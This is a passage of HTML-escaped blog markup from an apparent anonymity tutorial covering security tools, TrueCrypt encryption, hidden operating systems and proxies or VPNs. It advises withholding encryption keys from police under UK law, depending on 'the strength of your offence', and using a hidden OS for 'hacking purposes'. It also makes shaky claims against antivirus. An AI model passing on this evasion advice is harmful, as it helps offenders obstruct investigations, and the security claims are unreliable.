&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;I don&#39;t personally use an AV for many reasons reasons:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;It is possible to make an FUD virus, this is likely to be what you get infected with.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;It often goes around deleting your stuff without asking.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;They slow down your PC and often hog the CPU.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Whilst performing updates it slows down your connection.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;FireWall: &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wuux&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Comodo&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;KeyScrambler:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wuvn&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Download&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;HJT:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wuy7&quot;&gt;Download&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Malewarebytes:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wuz6&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Download&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Another way to prvent this is to use a Lixux-based O/S as altohugh these aren&#39;t 100% secure they have a lot on Windows machines due to the fact they are less common.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;But remember you are not invisible: &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;/span&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Encryption&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Be under no ilussions, this is one of the most important steps to keeping information secret. Now I am a big fan of encryption and here is why:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&quot;if your encryption program uses 128-bit keys, your particular key could be any of more than 3.4 trillion billion billion billion possible combinations. More likely to win the lottery than to crack that level of encryption using the brute-force method&quot;Or just use RSA 4096-bit and 256-bit AES&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Now I think this says a little bit about how much safer encryption makes you, if you encrypt your HDD using 256-bit, there is little chance even the authorities will crack it.... in your lifetime. However do be aware of local law for example in the UK the new Regulation of Investigatory Powers Act states:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Individuals who are believed to have the cryptographic keys necessary for such decryption will face up to 5 years in prison for failing to comply with police or military orders to hand over either the cryptographic keys, or the data in a decrypted form.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;The penelties are up to 5 years for terrorism-related inforamtion and 2 years for &quot;All other failures to comply&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Therefore depending on the strength of your offence it could be more wise to with-hold your key on claims of a privacy breach, and face the maximum two years than to hand over your keys.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;The program I most recomend for doing this is&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;TrueCrypt:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wv0g&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Download&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;True crypt can provdie 256-bit encryption&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;The design and strength of all key lengths of the AES algorithm (i.e., 128, 192 and 256) are sufficient to protect classified information up to the SECRET level. TOP SECRET information will require use of either the 192 or 256 key lengths.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;Oh and that&#39;s not even the most useful part:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;TrueCrypt allows you to create a hidden operating system whose existence will be impossible to prove (provided that certain guidelines are followed — see below). Thus, you will not have to decrypt or reveal the password for the hidden operating system.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;As there is a pre-boot authentication process which asks for your encryption password you can have two, one for people to see and one for hacking purposes. This is IMPOSSIBLE to prove so I highly recommed using it, although I don&#39;t use it myself...&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;Anonymity&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;Now, this is THE MOST IMPORTANT section of the whole tutorial, get this part right and you can pretty much forget about the rest (however if you are performing something illegal following the other steps might help you sleep better.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Hidding your IP and identity is crucial. Here is my prefred methods:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;SOCKS5 Proxy&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;L1 HTTPS Proxy&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;GCI proxy&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Encrypted VPN (no logs)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Diference between SOCKS and HTTP&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;SOCKS&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;Bill wishes to communicate with Jane over the internet, but a firewall exists on his network between them and Bill is not authorized to communicate through it himself. Therefore, he connects to the SOCKS proxy on his network and sends to it information about the connection he wishes to make to Jane. The SOCKS proxy opens a connection through the firewall and facilitates the communication between Bill and Jane. For more information on the technical specifics of the SOCKS protocol, see the sections below.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;HTTP&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;Bill wishes to download a web page from Jane, who runs a web server. Bill cannot directly connect to Jane&#39;s server, as a firewall has been put in place on his network. In order to communicate with the server, Bill connects to his network&#39;s HTTP proxy. His internet browser communicates with the proxy in exactly the same way it would the target server—it sends a standard HTTP request header. The HTTP proxy reads the request and looks for the Host header. It then connects to the server specified in the header and transmits any data the server replies with back to Bill.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;Remember:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;HTTP proxies are traditionally more HTTP protocol aware and do more high level filtering (even though that usually only applies to GET and POST methods, not CONNECT). SOCKS proxies can also forward UDP traffic and work in reverse - HTTP proxies can&#39;t do that.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;Due to the restrictions of a HTTP proxy, they ONLY work for HTTP traffic and do not support UDP and other types of proxy uses. the reason is because they &quot;infer the address of the server and therefore may only be used for HTTP traffic&quot;.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;Use both HTTP and SOCKS if possible though this is known as &quot;Proxy Chaining&quot; this is used to make your actions harder to trace but its not truely effective.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;b&gt;REMEBER:&lt;/b&gt; Do not use an L3 HTTP proxy as they show your true IP in the header and are therefore essentially pointless.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;VPN&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt; &lt;/span&gt;This is by far the most effective way to conceal your identity. It channels you traffic and encrpts it with 128-bit. Although some support 256-bit. Often a VPN is much more reliable and does not slow down your connection as much (in fact I haven&#39;t noticed mine at all)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;A VPN is a virtual Private Network&lt;/span&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&amp;nbsp;&quot;Secure VPNs use cryptographic tunneling protocols to provide confidentiality by blocking intercepts&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp; &lt;/span&gt;and packet sniffing, allow sender authentication to block identity spoofing, and provide message integrity by preventing message alteration.&quot;&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;ProxyFirewall is a good program which runs SOCKS and HTTP proxies&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wv2W&quot;&gt;Download &lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Cambria&amp;quot;,&amp;quot;serif&amp;quot;; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div 